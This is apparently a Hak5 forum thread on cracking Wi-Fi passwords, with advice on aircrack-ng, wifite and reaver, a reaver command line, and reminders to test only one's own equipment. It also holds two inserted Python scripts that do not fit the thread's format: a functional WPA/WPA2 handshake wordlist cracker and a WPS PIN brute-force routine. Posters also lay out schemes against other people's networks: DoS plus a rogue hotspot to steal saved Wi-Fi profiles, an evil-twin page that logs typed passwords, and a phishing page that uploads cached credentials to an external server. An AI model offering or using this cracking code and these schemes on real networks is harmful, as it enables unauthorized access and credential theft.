
How to get wi-fi passwords


gabri


Hello, I'm here because I want to find an answer to a thought I have had about finding a Wi-Fi password.

I also want to start by saying that I'm new to this "world"; what I know comes from passion and hobby, YouTube videos and old articles, so forgive me for obvious errors/questions.

What I'm searching for is a method to find the password of a Wi-Fi network. I've searched a lot on the internet, and I've found many methods, like brute-force attacks, or programs which try "standard" router passwords, and also methods like aircrack in Kali Linux. But for me, those methods require a lot of time, or a file in which you hope to have the password for the attack.

So I was thinking about something different, and that's what I would like to write here, to understand with your help if it can work or not.

Let's say the Wi-Fi I want to connect to is called "Alex". What I was thinking about is, first of all, to perform an attack in order to get the router down (something like a DoS attack against a website). Now, I immediately switch on my phone hotspot (the hope is that someone previously connected to "Alex" connects to my hotspot in order to find a solution on the internet, since it has no password). At this point, since we are on the same network, I enter his computer, find and download the file which contains all the passwords of the Wi-Fi networks that computer has connected to (for Windows, I think it is here: c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\[Interface Guid]). Then I decrypt it, and once they reboot the router, I connect to "Alex" with the password I've just found.

Does this make any sense to you? Or does it have inner problems which make it just a useless thought?

Thank you very much

Gabri


1 - How are you on the same network?

2 - How would you access the files?

 

Shutting down their router doesn't make them automatically connect to your hotspot. You can spoof their AP's SSID and hope they connect to you, but if they have a stored password expecting an encrypted network, it's not going to spit it out to you, even if you set up your hotspot with the same encryption. You can leave your hotspot open, to which their client might connect automatically, but that's not a guarantee. iPhones will probably do it, and older Windows, but I don't know if 7 and later will, or if Android will. You'd have to test it, which will also answer your question #1 above. As for #2, this again requires action on your part to exploit the target system, which means discovering nodes on the network, doing basic recon such as port scanning and service enumeration, sniffing local network traffic to see what kind of info the connected machines are transmitting, and if possible, exploiting a flaw in any of these services or protocols in use by the connected devices. From there, if you gain access to one of these machines, you'll then need to escalate privileges to get to the files you want, like the registry keys holding the wifi info, or on Linux/macOS, root to read the files. For iPhones and Androids I'm not even sure where to begin, although physical access would be much easier with respect to USB HID attacks.

 

Hopefully that gets you moving in the direction you'll need to research some of this, but here's the short answer: there is no "quick" way of doing any of this short of a 0-day, which in itself would require a lot of research and work to figure out. Capturing wifi info and breaking WPA2 is not that hard these days if they have WPS PIN access enabled. If not, brute forcing or tools like wifite would be where to start, but still, this only gets you onto the same AP you're trying to get passwords for. Attacking the nodes to get the keys will probably be harder without physical access to these machines or same-subnet access for exploitation.

 

If you do have access to a Windows machine, you can dump wifi passwords with tools like http://www.nirsoft.net/utils/wireless_key.html, which will pull them for you.


First of all, thank you for your answer.

As I expected, there are a lot of things I don't know. I supposed that once connected to the same network and then to one of the machines, you directly have admin privileges, but I was wrong. As for the connection, yes, I was hoping they would connect to my network since it doesn't require a password, but I wasn't considering that maybe they could have another access.

So, you consider this thought too laborious and not that practical, don't you?

And lastly, may I ask if you can suggest some materials in order to better understand the aspect of connecting to a computer (the physical machine), bypassing all the possible obstacles (which I think are the firewall and root access)?

Thanks again for your help!

Gabri


Not laborious, but something that will take effort. All things worth doing require work and practice to become good at them. Hacking is no different, and practice helps. First off, I'd say get familiar with manual tools like the aircrack suite and hack your home wifi, testing against yourself and machines you own (which is what you should be doing anyway unless hired to attack another person's system). From there, look for automation tools and how they help speed up the process, like wifite. When tools don't work, understand why, since doing it manually will give you a better understanding of what's going on and why, and how to troubleshoot issues. For starters, Linux or Kali in a VM with a USB wifi card capable of monitor mode will get you started. YouTube, as you mentioned, Google and other online resources are plentiful on the topic of wifi hacking, and there's plenty of readable info on the protocols and how they work, their flaws, etc. Once you can capture the 4-way handshake with WPA (WEP can be cracked in a few minutes, since it's a broken protocol; WPA requires brute force or WPS PIN code attacks), learn how to use wordlists to brute force the password. Set your wordlist up so that you put the password you know it to be in the wordlist, just so you can see it work.

After cracking the wifi password, I'd say move on to tools like nmap, and understand basic networking in general, from ARP requests to the different layers of the OSI model, to better understand things like MAC addresses being only layer 2 and IP being layer 3, and how that works for a local LAN vs the WAN. Learn how to find machines on the network (nmap will help, but it's not required; a simple ping sweep will let you find nodes with ARP, using built-in OS tools in Windows or Linux, and you can script these yourself).

Once you are comfortable finding machines on the network, learn about the various ports and services running on machines, and what may be potential flaws in how machines talk on the network. SMB or Samba, for example: if the Server, Browser and Workstation services are enabled, are there any file shares or Windows credentials floating around the network?

These will get you started, at least in a direction that will allow you to research the topics in general and learn more by doing than by copy and paste. Still, using online examples never hurts either; just learn how and why they do what they do in the examples you find. Setting up a home lab is a good idea too. If you only have one main desktop machine, then install VMware or VBox and install some virtual machines to test against locally. Once you are comfortable with setting up the lab and learning host discovery, give places like vulnhub.com a try and see how you can hack into different systems. They offer walkthroughs on almost all of the vulnerable virtual machines as well, which helps if you get stuck and have no idea where to start. I wouldn't jump right into the vulnhub stuff, though, till you get a good understanding of basic networking fundamentals and the use of tools like nmap, netcat / nc / ncat, and a simple understanding of traffic in tools like Wireshark. It will help a ton with a lot of this.

 

Online resources and topics:

what are ports and services

tcp/ip, UDP, and the OSI model

nmap.com

wireshark.com

offsec.com (check out the Metasploit section for learning metasploit)

securitytube and youtube 

vulnhub

google, google, google...

Courses, if you really want to dig in: CompTIA Network+, A+ and Linux+ for basics, but also a great foundation to build on later. For higher-level, more experienced users, offsec's PWK is a great course, but not for someone with no knowledge of basic networking and Linux fundamentals in general.

 

Also, these forums have a TON of info and links to various topics. Learn to use the search, and even google dork this site. Example:

https://www.google.com/search?client=opera&q=site%3Aforums.hak5.org&sourceid=opera&ie=UTF-8&oe=UTF-8#q=nmap+site:forums.hak5.org
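The cracking step described in the post above (capture the WPA 4-way handshake, then test each wordlist entry, putting your own known password in the list so you can see it work) boils down to a few well-defined computations. The script below is an added example for this thread, not aircrack-ng's code: it derives the PMK with PBKDF2, expands it to the PTK with the 802.11i PRF, and checks each candidate against the MIC of the client's EAPOL message 2, which is exactly the test aircrack-ng runs per candidate. A real run would take the SSID, both MACs, both nonces and message 2 from the airodump-ng capture; here constructed_handshake() builds those values from a known passphrase (the SSID "Alex" is taken from the thread, the MACs and nonces are arbitrary fixed bytes) so it runs offline. Key Info version 1 (WPA/TKIP) and version 2 (WPA2/CCMP) differ only in the MIC algorithm, which compute_mic handles.

```python
"""Cracking a captured WPA/WPA2-PSK 4-way handshake against a wordlist.

Added example for this thread, not aircrack-ng's code. Everything an attacker
would take from the airodump-ng capture (SSID, AP and client MACs, ANonce,
SNonce, the client's EAPOL message 2 with its MIC) is constructed in
constructed_handshake() from a known passphrase, so the script runs offline.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional

MIC_OFFSET = 81  # byte offset of the 16-byte Key MIC inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations per candidate are what make wordlist cracking slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The first 16 bytes (KCK) are the key that authenticates the handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 SHA-1 bytes >= the 64 bytes needed
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def build_eapol_key_frame(key_info: int, replay_counter: int, nonce: bytes,
                          mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key (RSN descriptor) frame with empty key data."""
    body = bytes([2])                          # descriptor type 2 = RSN
    body += key_info.to_bytes(2, "big")
    body += (16).to_bytes(2, "big")            # key length (CCMP)
    body += replay_counter.to_bytes(8, "big")
    body += nonce                              # 32 bytes
    body += b"\x00" * 16                       # Key IV
    body += b"\x00" * 8                        # Key RSC
    body += b"\x00" * 8                        # reserved
    body += mic                                # Key MIC, zero while computing it
    body += (0).to_bytes(2, "big")             # key data length
    header = bytes([2, 3]) + len(body).to_bytes(2, "big")  # EAPOL v2, type 3 = Key
    return header + body


def compute_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """MIC over the frame with its MIC field zeroed. Key Info version 1
    (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP) uses truncated HMAC-SHA1."""
    version = int.from_bytes(eapol_frame[5:7], "big") & 0x7
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes
    client_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol_msg2: bytes  # client's message 2, MIC included


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Return the wordlist entry that reproduces the captured MIC, or None."""
    target = hs.eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:      # WPA passphrase length limits
            continue
        pmk = pmk_from_passphrase(candidate, hs.ssid)
        kck = ptk_from_pmk(pmk, hs.ap_mac, hs.client_mac, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(compute_mic(kck, hs.eapol_msg2), target):
            return candidate
    return None


def constructed_handshake(passphrase: str = "correct horse battery", ssid: str = "Alex") -> Handshake:
    """Constructed stand-in for a real capture: MACs and nonces are arbitrary
    fixed values; the MIC is computed from the known passphrase."""
    ap_mac = bytes.fromhex("001122334455")
    client_mac = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    frame = build_eapol_key_frame(0x010A, 1, snonce)  # Key Info 0x010a: version 2, pairwise, MIC bit set
    mic = compute_mic(kck, frame)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return Handshake(ssid, ap_mac, client_mac, anonce, snonce, frame)


if __name__ == "__main__":
    hs = constructed_handshake()
    print(crack(hs, ["password", "letmein", "correct horse battery"]))
```

Only the MIC check proves a candidate right, and it costs 4096 HMAC-SHA1 rounds per candidate per SSID, which is why a password that is not in your wordlist (or not close to a rule-based mutation of one) does not fall to this attack, and why GPU speed and password strength set the cracking time, as haze1434 says further down the thread.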


  • 2 weeks later...

To be blunt, but polite, if you feel that Aircrack-ng "require(s) a lot of time, or a file in which you hope to have the password for the attack", and therefore you are not using it because of this, you have:

  1. Not understood Aircrack-ng enough (there are plenty of methods for attacking using Aircrack without a dictionary file), and
  2. You need to rethink your career/hobby goals. Hacking/pen testing requires patience and doesn't happen in seconds like in movies, and
  3. You're doing it wrong. I can grab a 4-way handshake using Aircrack-ng in a couple of minutes. The time taken to then crack the password relies upon your GPU power and the strength of the password, both of which will remain constant regardless of which program you use.

Once you have used, been successful with and understood Aircrack-ng, search for Wifite.sh

Edited by haze1434

Hi!

First of all I would like to thank digip for your help and precious information.

As an answer to haze1434, "You are right" is what I would say to your statements. I am sure I have not understood Aircrack-ng enough, because I lack the basics. I don't know most of the fundamentals of a network, or a router, what the process behind a network connection is, and so on. I'm trying for the first time to go deeper into the subject, and that's the reason I asked, in my second post, if someone could share links or materials where I could study.

I've seen a few videos of Wifite on YouTube too, and I've also tried the program, but I think I have a wifi card which doesn't support injection mode, since I can't move forward (like in aircrack-ng, I can't grab the handshake). Now I'm reading some materials on aircrack-ng.org and things are getting a bit clearer.

Of course, I won't give up.


To second the comments by haze1434, patience and desire to learn is critical along with acceptance of an extremely high failure rate if you want to be in this field as a career or hobby.  Learning from the multitude of failed attempts is what helps us succeed.  And I always roll my eyes when I see a 'hacker' in the movies magically do things in seconds - lol.  Read a lot, play a lot and don't give up.  Welcome to a fascinating world!!


  • 2 weeks later...

Hello!

I'm resuming this post in order to ask you for another piece of information:

I've finally bought a decent wifi card and I've also studied a lot these past days, but I've got a problem "in the field".

I manage to get the handshake with airodump-ng, but then I'm not able to do anything. I'll explain better.

Once I get the handshake, I want to crack the WPA, but not with the wordlist method, since I am 100% sure that the password is not in the files I have. So I tried reaver, but it gives me this error: "WPS pin not found!" (using Pixiewps). I've also tried wifite, but it gives me the same result too.

I don't understand what I did wrong, but I'm also 100% sure the problem is mine, since it happens on other networks too (not all networks; I could get into two).

I've written the command below, just to show you what I did:

reaver -i wlan1mon -b (bssid) -vv -K 1

P.S. I've tried both with airodump-ng wlan1mon and with wash -i wlan1mon, so I don't think it is a problem of WPS compatibility.

Thank you

G.


WPS PIN attacks are not the same as a brute-force attack. If you know the password (which you should if it's your router you're testing against), put a few words plus the password in any text file, each word on a line by itself.

As for WPS PIN attacks, the router has to have WPS enabled for them to work.

From the sounds of it, this isn't your router, and we don't condone attacking devices you don't own. You're on your own from here.



Hi,

thanks for all the information!

Yes, the router is not mine. The owner is a friend of mine and we are both into understanding how this works. So I asked him if I could use his router and he could do the same with mine. He agreed, so I think there is no problem.

At first, I used my router, but I found the password with reaver in less than 1 second (13 digits, with capital letters, numbers and lowercase letters). I don't know if this happened because the password was stored inside the network manager or for another reason, but this brought me to ask my friend to use his router (and I specifically requested him not to tell me the password). For this reason I asked here for help, because I don't know how to solve this problem.

Yesterday I also used "bully", but it was a really long process and I had to stop it. I've read that some say it's better than reaver; others say reaver has more options and is more reliable.


Glad to hear you are taking the ethical road! Ultimately what it comes down to is time and education. In order to truly know which tools work the best, you need to invest time (and it will take a lot of it). By really educating yourself on the benefits and drawbacks of each tool, you will always come out the winner. Why? Because every situation is different, and a well-educated hacker will know which tools serve him/her best for that situation. Keep in mind that this field is one where you must be very tolerant of a very high failure rate; that's all part of the education process. Lots of patience, and only changing one variable at a time. Trust me, it really pays off big time. If you're looking for a quick fix and win, then this is the wrong area of interest - lol. So dig in and find out for yourself about each option and why some folks like one tool over another. The best opinion is your own, because you'll always find someone else with theirs and all too willing to share. Stick with it and you will be one of the folks advising others one day!


On a side note, if you found your password quickly for your own router using WPS PIN code attacks such as reaver or wifite, disable it on your router. One of the reasons for assessing and testing with your own equipment is not just to learn how to attack, but also to learn how to defend and secure the device. If you can crack it in seconds, so can the rest of the world, and your network is open to attack. :ph34r:


11 hours ago, digip said:

One of the reasons for assessing and testing with your own equipment, is not just to learn how to attack, but also learn how to defend and secure the device. If you can crack it in seconds, so can the rest of the world and your network is open to attack. :ph34r:

On a funny side note, my father-in-law recently gave me the password for his NETGEAR router, which was something like 20 digits. Because of this, he thought it was secure (and you probably would too).

The problem was, I explained, that NETGEAR routers use a default password of an adjective, a noun and a few numbers. Which is what he was using.

Not sounding so secure now, right? I reckon that'd take less than an hour to crack.

I've advised him to change it.


That's the first thing I did when I bought my router: change the password to a non-standard one which was difficult to find... well, one I thought was difficult to find. But I was completely wrong, haha.

I also have another router, in which I can set whether I want a WPA or WPA2 password. In this case the default is WPS, but when I try to change the settings and choose WPA2, all the devices can't connect, showing a connection error. Do you think there is a big difference in protection, or is it OK to keep the router with WPA?

Another question is about the encryption: I can see that some routers still use TKIP and others CCMP. I know that some programs have problems working with the first one (like reaver). But this doesn't mean that it is more secure, right? From what I've understood, CCMP is for WPA2 and TKIP for WPA, so it's not about security but compatibility, right?


2 hours ago, gabri said:

Do you think there is a big difference in protection, or is it OK to keep the router with WPA?

Another question is about the encryption: I can see that some routers still use TKIP and others CCMP. I know that some programs have problems working with the first one (like reaver). But this doesn't mean that it is more secure, right? From what I've understood, CCMP is for WPA2 and TKIP for WPA, so it's not about security but compatibility, right?

Use WPA2 where you can. More secure. Attackers pretty much have to rely on capturing a handshake and cracking your password, meaning a decent password makes it almost(?!) impossible to break.

Never use WPS. Easy to break in to in minutes. Don't even need to capture a handshake.
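Why "minutes, no handshake needed" holds for WPS, and why digip's advice earlier in the thread to disable it is the right fix, comes down to two design flaws in the WPS registrar protocol: the 8th PIN digit is a checksum, and the AP tells the attacker separately whether the first four and the last three digits are right (a NACK at message M4 or M6). The script below is an added example for this thread, not reaver's or bully's code: it implements the checksum, enumerates the candidate space, and runs the online PIN search against a constructed registrar that models only those NACK responses (the real firmware may add a lockout after a few failures, and reaver's `-K 1` Pixie Dust mode used earlier in the thread is a different, offline attack not shown here).

```python
"""Why an online WPS PIN attack (reaver, bully, wifite) finishes in hours, not years.

Added example for this thread, not reaver's code. make_registrar() is a
constructed stand-in for the access point; it models only the protocol
behaviour the attack relies on: a NACK at M4 if the first half of the PIN is
wrong, a NACK at M6 if the second half is wrong.
"""
from typing import Callable, Iterator, Optional, Tuple


def wps_checksum_digit(first_seven: str) -> int:
    """The 8th digit of a WPS PIN is a checksum over the first seven:
    digits at positions 1, 3, 5, 7 weigh 3, positions 2, 4, 6 weigh 1."""
    if len(first_seven) != 7 or not first_seven.isdigit():
        raise ValueError("expected 7 digits")
    accum = 0
    for i, ch in enumerate(first_seven):
        accum += 3 * int(ch) if i % 2 == 0 else int(ch)
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum_digit(pin[:7])


def first_half_candidates() -> Iterator[str]:
    """The AP validates the first four digits on their own: 10^4 possibilities."""
    return (f"{i:04d}" for i in range(10_000))


def second_half_candidates(first_half: str) -> Iterator[str]:
    """Only 3 free digits remain once the first half is known; the 8th is fixed
    by the checksum, so 10^3 possibilities."""
    for j in range(1_000):
        seven = first_half + f"{j:03d}"
        yield seven + str(wps_checksum_digit(seven))


def worst_case_attempts() -> int:
    """10^4 + 10^3 protocol runs, versus 10^7 valid PINs if the halves were not split."""
    return 10_000 + 1_000


def make_registrar(true_pin: str) -> Callable[[str], str]:
    """Constructed AP: answers 'nack_m4', 'nack_m6' or 'ok' like a real registrar
    exchange does. No lockout is modelled; real firmware may add one."""
    def registrar(pin: str) -> str:
        if pin[:4] != true_pin[:4]:
            return "nack_m4"
        if pin[4:] != true_pin[4:]:
            return "nack_m6"
        return "ok"
    return registrar


def brute_force(registrar: Callable[[str], str]) -> Tuple[Optional[str], int]:
    """Recover the PIN from the registrar's NACKs; returns (pin, protocol runs used)."""
    attempts = 0
    first_half = None
    for fh in first_half_candidates():
        attempts += 1
        # Any second half will do here: M4 only reports on the first half.
        if registrar(fh + "0000") != "nack_m4":
            first_half = fh
            break
    if first_half is None:
        return None, attempts
    for pin in second_half_candidates(first_half):
        attempts += 1
        if registrar(pin) == "ok":
            return pin, attempts
    return None, attempts


if __name__ == "__main__":
    pin, runs = brute_force(make_registrar("12345670"))  # reaver's classic first guess
    print(pin, "recovered in", runs, "runs, worst case", worst_case_attempts())
```

Nothing in this attack touches the WPA passphrase directly: once the PIN is accepted, the registrar exchange hands over the network's PSK in M7, which is why the password's length and complexity (gabri's 13-character mix above) made no difference. The checksum and the split validation are protocol properties, so the only defence is turning WPS off, not choosing a better PIN.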


Some devices can't do WPA2 and may have to use WPA. This is usually a driver issue; an older XP workstation, for example, might need new wireless drivers or just a new card (my sister's laptop can't do 802.11n, 5GHz or WPA2, only a, b and g over 2.4GHz with WPA as the max, due to the age of the laptop and its internal wireless card; she could, however, use an external USB card to get onto WPA2).

 

If the other devices you own can't connect, make sure you manually set them up and connect them using the proper password and WPA2 settings. Nothing will automatically reconnect on its own once you change it over to WPA2 without WPS. You may have to tell it to forget the old AP settings and rescan for the SSID, but setting it up manually will be required for all devices that were on the AP before, once you disable WPS.


Wow, thank you very much for the support!! Actually I didn't think it could be a problem with my wireless card! But I remember that my phone couldn't see the network either... Tomorrow I have to try again and find a solution, maybe by buying a new router.

I have another question. I've just tried to use the "fake AP" method on my own network, but I have a problem: when I connect to the fake AP and then open the browser, it does not redirect me to the "fake router page". I have to enter the router address manually to find the fake AP page. Do you know a way to avoid this?

Linked to the previous question, I would like to ask if there is a way to set up the fake AP so that it records everything I type into the "fake router" page. I mean, right now if I type the wrong password, it says that the password is wrong and I have to re-enter it until I type the correct one. I just want to know if there is a way to log and send to the Kali terminal everything I write, while giving the same result ("wrong" if the password is not the right one, "loading" if the password is correct).

Thanks again!


  • 3 weeks later...

Funnily enough, a colleague and I were just talking about something like this. However, what we posed was this:

 

Suppose you spoof an AP and de-authenticate clients, relying on them to re-authenticate and connect to your MITM device, a Pineapple perhaps or a Kali-powered machine. Would it not be a possibility to create a phishing-type page to redirect them to, Google for example, which also deploys a self-executing script (à la Rubber Ducky) to pull out these cached passwords and upload them to your device or an external web server, before removing the script?

 

Of course there will be the reliance on the gullibility of PC users to accept any UAC prompts etc which may arise.

 

I'm a relative newbie, but my long-term aim is to become very educated in this field (having a great interest in it), so please forgive any general ignorance I might have of any security or technical limitations.

